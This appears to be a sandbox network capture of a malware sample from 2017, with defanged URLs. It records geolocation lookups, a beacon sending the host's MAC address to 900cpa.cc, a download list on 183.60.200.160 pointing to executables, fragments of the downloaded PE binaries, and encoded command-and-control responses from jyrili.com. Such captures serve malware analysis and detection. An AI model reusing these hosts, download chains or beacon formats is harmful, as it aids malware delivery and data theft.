7z..'.....;.........$........J...yh..]......J...@....=.N...;.<...h{
2.!.H:)...@...w.....D!QB...H4v.".^...Sg.....jm.R@..t....5Y.XJj..vyjN..
.O..k.E.".......#....c..kWZ.....8.E..5.. ^.z.n.l2.}.G.8....|",."B...${
Z..S...I...u..:}~..$f.$..4..m..... Aki...e...B....h..;3....v....j7ux..
..E.7|G...Xi..\..].d?n/@.....P... c.0....].N.564.$.../...`...\.(....P.
"...........d...)..H............#..b...~c....VO.v.Fe.D.9..4...........
..xJ............Ll...K..?V ../..h.C.u....g.q.lI1....w..s ..Ji..snO..5.
.&.."C....H.gg......OW)@.i7...........$Mp6:4,"...A'..D5o.....J2 p.h{y.
...)Cm.C~7.\;......c}....*Z .,..#E.T.]5..._SuN<AR?9.`....B..&......
.y.g........J.v.........WS..$*.c..,'..t...-...`..yy..jBF6\>..w.:..|
.qA..W.... H.....,.......Cr.jSu....p@...Oy*K..&...e.......x}.w..5Z....
.Y85.`"..1U...K?.T. .... ..8;H&Iz....g7|..P5.m9C.....L4."...lG.P_.....
...$.u..mI.f3L....S/j.A@..{...zs.....02..q....a<..i.[......`.......
;........S5...}...... ....18L....Rx..o{...d.X.......7E......R...[...1)
..[...3..c.....=.....y......~.I6.Bo..y.......<...l..o..s.l.t......E
....P .m.....&F.t.V..3..w...4.o.m#.....zSDH.R.0..E.%.'.{.......%..Xc.H
io.~>.......z.p.K.`.....q.2......9.F..F...3...\...i'....5..|..~..l.
.1zB..Z...$...KF.C.......GMuw.._.}L..w.G..,.=#.6p.c.D.bz....Y..`.3...b
?.dS-e0...3...t2'...dX...&)... ..X...3R....t......u.B...@...S.U%......
..H.........Z........LK..u.....4.:..o...'3.[..dO&....-*&.u..?..l...../
c.i.._{.>K....f.Tp.w. ......f..._9.....b.............._G........z..
 =.f:e/f........x..2.1O.......}..y...Y=LG...!..l......$u. ...r....
<<< skipped >>>

GET /ip2city.asp HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: VVV.ip138.com

Cache-Control: no-cache

HTTP/1.0 302 Moved Temporarily

Server: Cdn Cache Server V2.0

Date: Tue, 17 Jan 2017 11:53:07 GMT

Content-Length: 0

Location: hXXp://city.ip138.com/ip2city.asp

GET /ip2city.asp HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: city.ip138.com

Cache-Control: no-cache

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Tue, 17 Jan 2017 11:53:05 GMT

Server: Microsoft-IIS/6.0

Content-Length: 211

Content-Type: text/html

Set-Cookie: ASPSESSIONIDSSDBACSR=PHNPNEPBEKPMLOMHJFGJANEJ; path=/

Cache-control: private
<html>..<head>..<meta http-equiv="content-type" content
="text/html; charset=gb2312">..<title> ....IP.... </title&
gt;..</head>..<body style="margin:0px"><center>....I
P........[194.242.96.218] </center></body></html>HTT
P/1.1 200 OK..Date: Tue, 17 Jan 2017 11:53:05 GMT..Server: Microsoft-I
IS/6.0..Content-Length: 211..Content-Type: text/html..Set-Cookie: ASPS
ESSIONIDSSDBACSR=PHNPNEPBEKPMLOMHJFGJANEJ; path=/..Cache-control: priv
ate..<html>..<head>..<meta http-equiv="content-type" co
ntent="text/html; charset=gb2312">..<title> ....IP.... </t
itle>..</head>..<body style="margin:0px"><center>
....IP........[194.242.96.218] </center></body></html&g
t;....


GET /ips.htm?ip=194.242.96.218&action=2 HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: city.ip138.com

Cache-Control: no-cache

Connection: Keep-Alive

Cookie: ASPSESSIONIDSSDBACSR=PHNPNEPBEKPMLOMHJFGJANEJ

HTTP/1.1 200 OK

Cache-Control: max-age=86400

Content-Length: 323

Content-Type: text/html

Last-Modified: Sat, 21 Apr 2012 01:52:32 GMT

Accept-Ranges: bytes

ETag: "3a3cc6a611fcd1:9a8"

Server: Microsoft-IIS/6.0

Date: Tue, 17 Jan 2017 11:53:05 GMT
<html>..<head>..<meta http-equiv="Content-Type" content
="text/html; charset=gb2312">..<title>IP........</title>
;..</head>..<body>..<script type="text/javascript">.
.location.href="hXXp://VVV.ip138.com/ips138.asp"   location.search;..&
lt;/script> ..<a href="hXXp://VVV.ip138.com/ips138.asp">IP...
...........</a>..</body>..</html>HTTP/1.1 200 OK..Ca
che-Control: max-age=86400..Content-Length: 323..Content-Type: text/ht
ml..Last-Modified: Sat, 21 Apr 2012 01:52:32 GMT..Accept-Ranges: bytes
..ETag: "3a3cc6a611fcd1:9a8"..Server: Microsoft-IIS/6.0..Date: Tue, 17
 Jan 2017 11:53:05 GMT..<html>..<head>..<meta http-equi
v="Content-Type" content="text/html; charset=gb2312">..<title>
;IP........</title>..</head>..<body>..<script typ
e="text/javascript">..location.href="hXXp://VVV.ip138.com/ips138.as
p"   location.search;..</script> ..<a href="hXXp://VVV.ip138.
com/ips138.asp">IP..............</a>..</body>..</htm
l>....


GET /ip2city.asp HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: city.ip138.com

Cache-Control: no-cache

Connection: Keep-Alive

Cookie: ASPSESSIONIDSSDBACSR=PHNPNEPBEKPMLOMHJFGJANEJ

HTTP/1.1 200 OK

Date: Tue, 17 Jan 2017 11:53:37 GMT

Server: Microsoft-IIS/6.0

Content-Length: 211

Content-Type: text/html

Cache-control: private
<html>..<head>..<meta http-equiv="content-type" content
="text/html; charset=gb2312">..<title> ....IP.... </title&
gt;..</head>..<body style="margin:0px"><center>....I
P........[194.242.96.218] </center></body></html>HTT
P/1.1 200 OK..Date: Tue, 17 Jan 2017 11:53:37 GMT..Server: Microsoft-I
IS/6.0..Content-Length: 211..Content-Type: text/html..Cache-control: p
rivate..<html>..<head>..<meta http-equiv="content-type"
 content="text/html; charset=gb2312">..<title> ....IP.... <
;/title>..</head>..<body style="margin:0px"><center&
gt;....IP........[194.242.96.218] </center></body></htm
l>....


GET /ips.htm?ip=194.242.96.218&action=2 HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: city.ip138.com

Cache-Control: no-cache

Connection: Keep-Alive

Cookie: ASPSESSIONIDSSDBACSR=PHNPNEPBEKPMLOMHJFGJANEJ

HTTP/1.1 200 OK

Cache-Control: max-age=86400

Content-Length: 323

Content-Type: text/html

Last-Modified: Sat, 21 Apr 2012 01:52:32 GMT

Accept-Ranges: bytes

ETag: "3a3cc6a611fcd1:9a8"

Server: Microsoft-IIS/6.0

Date: Tue, 17 Jan 2017 11:53:37 GMT
<html>..<head>..<meta http-equiv="Content-Type" content
="text/html; charset=gb2312">..<title>IP........</title>
;..</head>..<body>..<script type="text/javascript">.
.location.href="hXXp://VVV.ip138.com/ips138.asp"   location.search;..&
lt;/script> ..<a href="hXXp://VVV.ip138.com/ips138.asp">IP...
...........</a>..</body>..</html>HTTP/1.1 200 OK..Ca
che-Control: max-age=86400..Content-Length: 323..Content-Type: text/ht
ml..Last-Modified: Sat, 21 Apr 2012 01:52:32 GMT..Accept-Ranges: bytes
..ETag: "3a3cc6a611fcd1:9a8"..Server: Microsoft-IIS/6.0..Date: Tue, 17
 Jan 2017 11:53:37 GMT..<html>..<head>..<meta http-equi
v="Content-Type" content="text/html; charset=gb2312">..<title>
;IP........</title>..</head>..<body>..<script typ
e="text/javascript">..location.href="hXXp://VVV.ip138.com/ips138.as
p"   location.search;..</script> ..<a href="hXXp://VVV.ip138.
com/ips138.asp">IP..............</a>..</body>..</htm
l>....


GET /ip2city.asp HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: city.ip138.com

Cache-Control: no-cache

Connection: Keep-Alive

Cookie: ASPSESSIONIDSSDBACSR=PHNPNEPBEKPMLOMHJFGJANEJ

HTTP/1.1 200 OK

Date: Tue, 17 Jan 2017 11:53:55 GMT

Server: Microsoft-IIS/6.0

Content-Length: 211

Content-Type: text/html

Cache-control: private
<html>..<head>..<meta http-equiv="content-type" content
="text/html; charset=gb2312">..<title> ....IP.... </title&
gt;..</head>..<body style="margin:0px"><center>....I
P........[194.242.96.218] </center></body></html>HTT
P/1.1 200 OK..Date: Tue, 17 Jan 2017 11:53:55 GMT..Server: Microsoft-I
IS/6.0..Content-Length: 211..Content-Type: text/html..Cache-control: p
rivate..<html>..<head>..<meta http-equiv="content-type"
 content="text/html; charset=gb2312">..<title> ....IP.... <
;/title>..</head>..<body style="margin:0px"><center&
gt;....IP........[194.242.96.218] </center></body></htm
l>....


GET /ips.htm?ip=194.242.96.218&action=2 HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: city.ip138.com

Cache-Control: no-cache

Connection: Keep-Alive

Cookie: ASPSESSIONIDSSDBACSR=PHNPNEPBEKPMLOMHJFGJANEJ

HTTP/1.1 200 OK

Cache-Control: max-age=86400

Content-Length: 323

Content-Type: text/html

Last-Modified: Sat, 21 Apr 2012 01:52:32 GMT

Accept-Ranges: bytes

ETag: "3a3cc6a611fcd1:9a8"

Server: Microsoft-IIS/6.0

Date: Tue, 17 Jan 2017 11:53:55 GMT
<html>..<head>..<meta http-equiv="Content-Type" content
="text/html; charset=gb2312">..<title>IP........</title>
;..</head>..<body>..<script type="text/javascript">.
.location.href="hXXp://VVV.ip138.com/ips138.asp"   location.search;..&
lt;/script> ..<a href="hXXp://VVV.ip138.com/ips138.asp">IP...
...........</a>..</body>..</html>HTTP/1.1 200 OK..Ca
che-Control: max-age=86400..Content-Length: 323..Content-Type: text/ht
ml..Last-Modified: Sat, 21 Apr 2012 01:52:32 GMT..Accept-Ranges: bytes
..ETag: "3a3cc6a611fcd1:9a8"..Server: Microsoft-IIS/6.0..Date: Tue, 17
 Jan 2017 11:53:55 GMT..<html>..<head>..<meta http-equi
v="Content-Type" content="text/html; charset=gb2312">..<title>
;IP........</title>..</head>..<body>..<script typ
e="text/javascript">..location.href="hXXp://VVV.ip138.com/ips138.as
p"   location.search;..</script> ..<a href="hXXp://VVV.ip138.
com/ips138.asp">IP..............</a>..</body>..</htm
l>..

GET /tongji.php?ver=hongchen&mac=00:50:56:38:44:C4&pid=2948&did=-1289677981&mid=axac HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: VVV.900cpa.cc:8080

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: text/html

Server: Microsoft-IIS/8.0

X-Powered-By: PHP/5.2.17

X-Powered-By: ASP.NET

Date: Tue, 17 Jan 2017 11:53:10 GMT

Content-Length: 6
......HTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/
8.0..X-Powered-By: PHP/5.2.17..X-Powered-By: ASP.NET..Date: Tue, 17 Ja
n 2017 11:53:10 GMT..Content-Length: 6............


GET /tongji.php?ver=hongchen&mac=00:50:56:38:44:C4&pid=2948&did=-1289677981&mid=axac HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: VVV.900cpa.cc:8080

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: text/html

Server: Microsoft-IIS/8.0

X-Powered-By: PHP/5.2.17

X-Powered-By: ASP.NET

Date: Tue, 17 Jan 2017 11:53:29 GMT

Content-Length: 6
......HTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/
8.0..X-Powered-By: PHP/5.2.17..X-Powered-By: ASP.NET..Date: Tue, 17 Ja
n 2017 11:53:29 GMT..Content-Length: 6..........

GET /ips.asp?ip=194.242.96.218&action=2 HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: VVV.ip138.com

Cache-Control: no-cache

HTTP/1.0 302 Moved Temporarily

Server: Cdn Cache Server V2.0

Date: Tue, 17 Jan 2017 11:52:37 GMT

Content-Length: 0

Location: hXXp://city.ip138.com/ips.htm?ip=194.242.96.218&action=2

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w= HTTP/1.1

Cache-Control: max-age = 440358

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Mon, 18 Nov 2013 13:12:21 GMT

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com

HTTP/1.1 200 OK

Server: nginx/1.10.2

Content-Type: application/ocsp-response

Content-Length: 1454

content-transfer-encoding: binary

Cache-Control: max-age=477760, public, no-transform, must-revalidate

Last-Modified: Mon, 16 Jan 2017 00:35:16 GMT

Expires: Mon, 23 Jan 2017 00:35:16 GMT

Date: Tue, 17 Jan 2017 11:53:38 GMT

Connection: keep-alive
0..........0..... .....0......0...0........FC..&..<.0...Y......2017
0116003516Z0s0q0I0... ........H.dI.....3..^B...d6Q....ZL%."..1.m..._).
.a..eR&.....Y.)..".\....20170116003516Z....20170123003516Z0...*.H.....
.........c...M.....).J.....^.D.%}e..L.%......Ql...q.A &J..?...NH...a..
H....'.J..;.Q..t.p..../Kl'...|..\.~.gh8`.&..'..B ...^...^A....9 ..Il.E
..c.....k...P-...F..7>....M2..R...... m.ug.....<..%*..../.\^....
...,8..z..u.w|. .....v....wvZ.vv........sF...x{ H3...j..G.s7....0...0.
..0..4.......My_e.\....'....j0...*.H........0_1.0...U....US1.0...U....
VeriSign, Inc.1705..U....Class 3 Public Primary Certificatio..

GET /yy.txt HTTP/1.1

Accept: */*

Referer: hXXp://183.60.200.160:8080/yy.txt

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: 183.60.200.160:8080

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Length: 196

Content-Type: text/plain

Last-Modified: Mon, 16 Jan 2017 10:44:15 GMT

Accept-Ranges: bytes

ETag: "277647be56fd21:7fc"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Tue, 17 Jan 2017 11:52:54 GMT
<project>..<url>hXXp://183.60.200.160:8080/1819.exe</ur
l>..<parameter></parameter>..</project>..<proj
ect>..<url>hXXp://dl.jyrili.com/download/src2011.exe</url&
gt;..<parameter></parameter>..</project>....


GET /1819.exe HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Connection: keep-alive

Referer: hXXp://183.60.200.160:8080/1819.exe

Content-Type: application/x-www-form-urlencoded

Host: 183.60.200.160:8080

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Length: 1314816

Content-Type: application/octet-stream

Last-Modified: Thu, 06 Oct 2016 16:07:20 GMT

Accept-Ranges: bytes

ETag: "4fe773b7eb1fd21:7fc"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Tue, 17 Jan 2017 11:52:54 GMT
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.............b...b.
..b...n...b...i...b...h...b.;.l...b...q...b...q...b...c.&.b.;.?...b...
i...b...h.{.b.P.i...b...b...b...d...b.Rich..b.........PE..L....u.W....
.................0....................@..........................0....
.......................................... ........... ...............
......................................................................
.......................text............................... ..`.rdata..
............................@..@.data...J-..........................@.
...rsrc... ........ ..................@..@............................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>

GET /download/src2011.exe HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Connection: keep-alive

Referer: hXXp://dl.jyrili.com/download/src2011.exe

Content-Type: application/x-www-form-urlencoded

Host: dl.jyrili.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/octet-stream

Content-Length: 1416576

Connection: keep-alive

Date: Tue, 17 Jan 2017 10:59:36 GMT

Last-Modified: Wed, 11 Jan 2017 10:52:07 GMT

ETag: "58760e57-159d80"

Accept-Ranges: bytes

Via: cache20.l2cm12[0,304-0,H], cache14.l2cm12[0,0], kunlun9.cn133[0,200-0,H], kunlun10.cn133[0,0]

Age: 3216

X-Cache: HIT TCP_MEM_HIT dirn:9:815987160

X-Swift-SaveTime: Tue, 17 Jan 2017 11:47:25 GMT

X-Swift-CacheTime: 3600

Timing-Allow-Origin: *

EagleId: ab6f9aca14846539925383427e
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.........F....................@..........................@............
@......@..............................P........ ...........]..x@......
......................................................................
..............CODE....0........................... ..`DATA....P.......
....................@...BSS......................................idata
..P...........................@....tls................................
.....rdata..............................@..P.reloc....................
..........@..P.rsrc.... .......,..................@..P.............@..
....................@..P..............................................
......................................................................
..............................................string................&l
t;.@.....m.@..........)@..(@..(@..)@.....$)@..Free..0)@..InitInstance.
.L)@..CleanupInstance..h(@..ClassType..l(@..ClassName...(@..ClassNameI
s...(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..InheritsF
rom...)@..Dispatch...)@..MethodAddress..<*@..MethodName..x*@..Field
Address...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObj
ect.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.
@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.
<<< skipped >>>

GET /fwlink?linkid=30219&locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2 HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Pragma: no-cache

User-Agent: GamesWebServiceLocations

Host: go.microsoft.com

HTTP/1.1 302 Moved Temporarily

Cache-Control: no-cache

Pragma: no-cache

Expires: -1

Location: hXXp://movie.metaservices.microsoft.com/locater/WMServiceLocater.asmx/GetServiceLocationsForClient?locale=en-US&clientType=VISTA_GAMES&clientVersion=6.1.2

Server: Microsoft-IIS/8.5

X-AspNetMvc-Version: 5.2

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Content-Length: 0

Date: Tue, 17 Jan 2017 11:52:37 GMT

Connection: keep-alive
HTTP/1.1 302 Moved Temporarily..Cache-Control: no-cache..Pragma: no-ca
che..Expires: -1..Location: hXXp://movie.metaservices.microsoft.com/lo
cater/WMServiceLocater.asmx/GetServiceLocationsForClient?locale=en-US&
clientType=VISTA_GAMES&clientVersion=6.1.2..Server: Microsoft-IIS/8.5.
.X-AspNetMvc-Version: 5.2..X-AspNet-Version: 4.0.30319..X-Powered-By: 
ASP.NET..Content-Length: 0..Date: Tue, 17 Jan 2017 11:52:37 GMT..Conne
ction: keep-alive..

GET /ip2city.asp HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: VVV.ip138.com

Cache-Control: no-cache

HTTP/1.0 302 Moved Temporarily

Server: Cdn Cache Server V2.0

Date: Tue, 17 Jan 2017 11:53:27 GMT

Content-Length: 0

Location: hXXp://city.ip138.com/ip2city.asp

GET /client.do/?method=configex&version=4.0.3.0&source=2011&uuid=eac20991f7339f1829e5efdfb10e6fbb HTTP/1.1

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Host: VVV.jyrili.com

HTTP/1.1 200 OK

Server: nginx/1.4.4

Date: Tue, 17 Jan 2017 11:53:32 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Powered-By: PHP/5.5.7
91..{"code":"00000","data":"hXXp://dl.jyrili.com/download/extenconfig/
exconfig.dat","desc":"succ","flag":"0","id":"hohonaplgfolmdaaafoddgbia
kognoal"}..0..HTTP/1.1 200 OK..Server: nginx/1.4.4..Date: Tue, 17 Jan 
2017 11:53:32 GMT..Content-Type: text/html..Transfer-Encoding: chunked
..Connection: keep-alive..Vary: Accept-Encoding..X-Powered-By: PHP/5.5
.7..91..{"code":"00000","data":"hXXp://dl.jyrili.com/download/extencon
fig/exconfig.dat","desc":"succ","flag":"0","id":"hohonaplgfolmdaaafodd
gbiakognoal"}..0......


GET /client.do/?method=bm&version=4.0.3.0&source=2011&uuid=eac20991f7339f1829e5efdfb10e6fbb HTTP/1.1

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Host: VVV.jyrili.com

HTTP/1.1 200 OK

Server: nginx/1.4.4

Date: Tue, 17 Jan 2017 11:53:34 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Powered-By: PHP/5.5.7
570..{"code":"00000","data":"E1JQEgdfFBZFIgU0C00aXUQnGHJ1XTpJRRIcH0RBa
AcUVmkfcURqTRcVEngBHxNNVTBdA0gPbHw0Z0ETCUgeRUMfFBkEBkhLR1NuBCUPHhVbQ0A
WA0NHYB9HAVYSf0o9Wx4CA14QUQtVKy0eEQ0EbCZdfx1COhMYSkEGKwJtGEEAFxxxCSxNO
wgCSAtRC1VGelRbQxdEMhovTAYzFEFRSRMAAC8HFVlcVCZGK0YfREoPFxZCAyIqRVUCF1g
nHDgTLkk6AgQERlkfOUZGCgYeMAcldV1ZEkNOSgNDT2gYQw9qWDIHF1kVREoPBgFdExIrS
lUCF2wmX34eFzoTGBYSBysCbExHCGlFZw14Sy4TAEtDEG0CQz4fR2RABTBbeXUHUVFIRi9
ETkdtGlUUF1E3DAFHFgMeD0lRA1UKdFJVTFRCNA08fAAKRBdRBEYAWTBIGAkHA30LJ0RQS
kRJFgBFIgU0C00aXUQnGHJ1XTpJWgQEHx8WNxhFCxtTPAUUBk0SCBBKQQVPR2kdQGddUTw
3OE5QSkRYAR9VEgQ7C00aXVE8WXoaLToTGRZDUCsCb09CCWlFZw0rTC4TXksXSm0CTmlKF
GRABTVYeHUHU19OEVEdVRY8TT5WUVUrSnILRkQbAQhRRRYFP0wDbUdccVJqXgURSB9ARwR
ZFDdEVRQXVDYbPHwACkQXURtFAwdidVhkGkckH2YbQVJTAxAcXCtYZ0JPDQcCZlhxHVBKR
FgBH1USBDsLTRoHA2ddFFxFAFMcLwYEQENodQINV1YwND0RQFQHAC8GBBFHaHUCDQcBMTQ
9HRdUAnEGRgcREwRcT15WBw8dfx9FAzpYRhYGQystHENbBGwmX3odEURKDxIXVT4ZPEwPG
g8SZUo1BQlEEkwBFFQDIipFVQIXRyQfZl0TCQRMHF1SGBp6BVVcUEMnPTpFUFxERQcHQU0
rd3VYWVweJwknSxMJSE4cHm1YSChAEwVYXQxRcRpLUVMdQiwAR0ZhHUMJAW9gW3EaRlVUH
FFfEwIFNE0SS1YSaUoUXEQCAhUvBgQVTjx1Ag9TBWJFFFxEAgIVU1IRKwJuG0YJaUVmXXF
KLhNQT0FBE1tVOU0TcVtUNhBqE1BeRFBfCBMDFipOEkxgQj9KcgsFEREDBx5QGxt2ShhVF
xxxDC1aBjMUQVFJEx8DLFlNZBpsfAkhBwYHCU8SHB8UGDV1WAdFWTdVJUQtX18eSkQER0Y
HGEcJDARnWXx2QVVfHkdAA0ZVdAsCSllUNhsrC0hEOlhGEAAWKy0cTgoMbCZfexsQOhNLF
UNSKwJtSkQJaUVmUXlPLhNSSEtFE1tVOU0TcVtUNhBqE1BfRFAu","desc":"succ"}..0
......
<<< skipped >>>

GET /client.do/?method=cupdate&version=4.0.3.0&source=2011&uuid=eac20991f7339f1829e5efdfb10e6fbb HTTP/1.1

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Host: VVV.jyrili.com

HTTP/1.1 200 OK

Server: nginx/1.4.4

Date: Tue, 17 Jan 2017 11:53:35 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Powered-By: PHP/5.5.7
97..{"code":"00000","data":"{version=2.0.4.0&url=hXXp://dl.jyrili.com/
download/cupdate/cupdate.dat}","desc":"succ","id":"hohonaplgfolmdaaafo
ddgbiakognoal"}..0..HTTP/1.1 200 OK..Server: nginx/1.4.4..Date: Tue, 1
7 Jan 2017 11:53:35 GMT..Content-Type: text/html..Transfer-Encoding: c
hunked..Connection: keep-alive..Vary: Accept-Encoding..X-Powered-By: P
HP/5.5.7..97..{"code":"00000","data":"{version=2.0.4.0&url=hXXp://dl.j
yrili.com/download/cupdate/cupdate.dat}","desc":"succ","id":"hohonaplg
folmdaaafoddgbiakognoal"}..0..

GET /ips.asp?ip=194.242.96.218&action=2 HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: VVV.ip138.com

Cache-Control: no-cache

HTTP/1.0 302 Moved Temporarily

Server: Cdn Cache Server V2.0

Date: Tue, 17 Jan 2017 11:53:09 GMT

Content-Length: 0

Location: hXXp://city.ip138.com/ips.htm?ip=194.242.96.218&action=2

GET /CRL/Omniroot2025.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Sat, 16 Nov 2013 06:15:02 GMT

If-None-Match: "200da-5b6-4eb453c33260e"

User-Agent: Microsoft-CryptoAPI/6.1

Host: cdp1.public-trust.com

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: application/x-pkcs7-crl

Date: Tue, 17 Jan 2017 11:52:46 GMT

Etag: "200c0-ca3-54535e76797e9"

Last-Modified: Tue, 03 Jan 2017 19:45:01 GMT

Server: ECS (arn/45CB)

X-Cache: HIT

Content-Length: 3235
0...0......0...*.H........0Z1.0...U....IE1.0...U....Baltimore1.0...U..
..CyberTrust1"0 ..U....Baltimore CyberTrust Root..170103190202Z..17033
1190202Z0...0....'k...120111220757Z0....'k...120111220847Z0....'.C..13
0130174530Z0....'....130807173059Z0....'....140122185220Z0....'....140
212185542Z0....'yr..150701184507Z0....'#...100303201301Z0....''q..1004
14175202Z0....'L...110224181251Z0....'Pn..110309142119Z0....'....10021
6203312Z0....'#...100303201213Z0....'3#..100908172555Z0....''n..101208
175627Z0....''m..101208175749Z0....''p..101208175916Z0....'H...1101141
62156Z0#...'X>..110815145134Z0.0...U.......0#...'Z2..110818184101Z0
.0...U.......0....'g...120111164333Z0....'g...120111164409Z0....'g...1
20111164519Z0....'....100216213519Z0....''s..100414175225Z0....''k..10
0414181839Z0....'3"..100908172705Z0....'3$..100908172728Z0....''o..101
208175645Z0....''l..101208175727Z0....'H...110119195142Z0....'Nz..1103
02154045Z0....'c...111207220933Z0....'g...120111164445Z0....''r..10041
4175143Z0....'8...101012182723Z0....'e...120111163041Z0....'VJ..110714
160903Z0....'s...130123162633Z0....'....130904190524Z0....'....1310242
14319Z0....'....140129172435Z0....'....140129172453Z0....'....13102421
4310Z0....'....131101204601Z0....'....140219171632Z0....'.^..140409155
638Z0....'i...140709171930Z0....'/:..141119193302Z0....'J...1506031846
05Z0....'k...150603185020Z0....'k...150603185058Z0....'k...15060318513
1Z0....'k...120111220827Z0....'8...140716191203Z0....'....131219195909
Z0....'....140219171545Z0....'k...151105070000Z0....'q...160126173
<<< skipped >>>

GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCEAdrg7dKqon HTTP/1.1

Cache-Control: max-age = 345600

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: clients1.google.com

HTTP/1.1 404 Not Found

Date: Tue, 17 Jan 2017 11:53:27 GMT

Content-Type: text/html; charset=UTF-8

Server: ocsp_responder

Content-Length: 1668

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN
<!DOCTYPE html>.<html lang=en>.  <meta charset=utf-8>
;.  <meta name=viewport content="initial-scale=1, minimum-scale=1, 
width=device-width">.  <title>Error 404 (Not Found)!!1</ti
tle>.  <style>.    *{margin:0;padding:0}html,code{font:15px/2
2px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body
{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px
}* > body{background:url(//VVV.google.com/images/errors/robot.png) 
100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:h
idden}ins{color:#777;text-decoration:none}a img{border:0}@media screen
 and (max-width:772px){body{background:none;margin-top:0;max-width:non
e;padding-right:0}}#logo{background:url(//VVV.google.com/images/brandi
ng/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:
-5px}@media only screen and (min-resolution:192dpi){#logo{background:u
rl(//VVV.google.com/images/branding/googlelogo/2x/googlelogo_color_150
x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//VVV.googl
e.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}
@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{backgr
ound:url(//VVV.google.com/images/branding/googlelogo/2x/googlelogo_col
